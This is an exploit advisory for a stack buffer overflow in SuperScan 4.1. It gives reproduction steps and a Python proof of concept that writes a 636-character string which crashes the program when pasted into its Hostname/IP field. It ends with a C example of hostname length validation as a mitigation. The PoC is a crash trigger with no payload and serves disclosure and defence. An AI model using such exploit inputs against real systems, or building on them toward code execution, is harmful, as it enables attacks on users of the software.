SuperScan 4.1 Buffer Overflow
Exploit Title: SuperScan v4.1 - Stack Buffer Overflow (PoC)
Discovered by: Ahmet Ümit BAYRAM
Discovered Date: 18.09.2023
Vendor: Foundstone Inc
Software Link: https://delivery2.filecroco.com/kits_6/superscan-4.1.zip
Tested Version: v4.1 (latest)
Tested on: Windows 2019 Server 64bit
Steps to Reproduce

Open the SuperScan application.
Paste the content of poc.txt into the Hostname / IP box.
Click the arrow button next to the box.
The application crashes due to a buffer overflow.

Proof of Concept (PoC)

The following Python script generates a poc.txt file containing the
payload. When loaded into the Hostname / IP field, it triggers a buffer
overflow and crashes the application.

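#!/usr/bin/python

# 636 "A" characters: the input length that crashes SuperScan 4.1
poc = "A" * 636

try:
    # Write the payload to poc.txt for pasting into the Hostname / IP box
    with open("poc.txt", "w") as file:
        file.write(poc)
    print("POC is created")
except Exception as e:
    print("POC is not created:", e)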
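The mitigation side of this crash, as an added example that is not SuperScan's code or part of the original advisory: a hostname field validated and length-checked before it is copied into a fixed-size buffer. The page does not show the vulnerable code, so the fixed-size destination is an assumption, and `copy_hostname`, `HOST_MAX` and `LABEL_MAX` are hypothetical names.

```c
#include <ctype.h>
#include <string.h>

#define HOST_MAX  253  /* longest DNS name in text form */
#define LABEL_MAX 63   /* longest single DNS label */

/* Copy `in` to `out` only if it is a plausible hostname or dotted IPv4
 * string that fits in `out`. Returns 0 on success; on any failure returns
 * -1 and leaves `out` as an empty string. */
int copy_hostname(char *out, size_t out_size, const char *in)
{
    size_t len, i, label = 0;

    if (out == NULL || out_size == 0)
        return -1;
    out[0] = '\0';
    if (in == NULL)
        return -1;

    /* Bounded scan: stops as soon as the input exceeds HOST_MAX. */
    for (len = 0; in[len] != '\0'; len++)
        if (len >= HOST_MAX)
            return -1;          /* e.g. the 636-character poc.txt string */
    if (len == 0 || len >= out_size)
        return -1;              /* empty, or no room for the terminator */

    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)in[i];
        if (c == '.') {
            if (label == 0 || in[i - 1] == '-')
                return -1;      /* empty label or label ending in '-' */
            label = 0;
        } else if (isalnum(c) || (c == '-' && label > 0)) {
            if (++label > LABEL_MAX)
                return -1;
        } else {
            return -1;          /* character not allowed in a hostname */
        }
    }
    if (in[len - 1] == '-')
        return -1;
    memcpy(out, in, len + 1);   /* length already proven < out_size */
    return 0;
}
```

The 636-character string is rejected twice over: it exceeds the 253-character name limit, and as a single label it exceeds 63 characters.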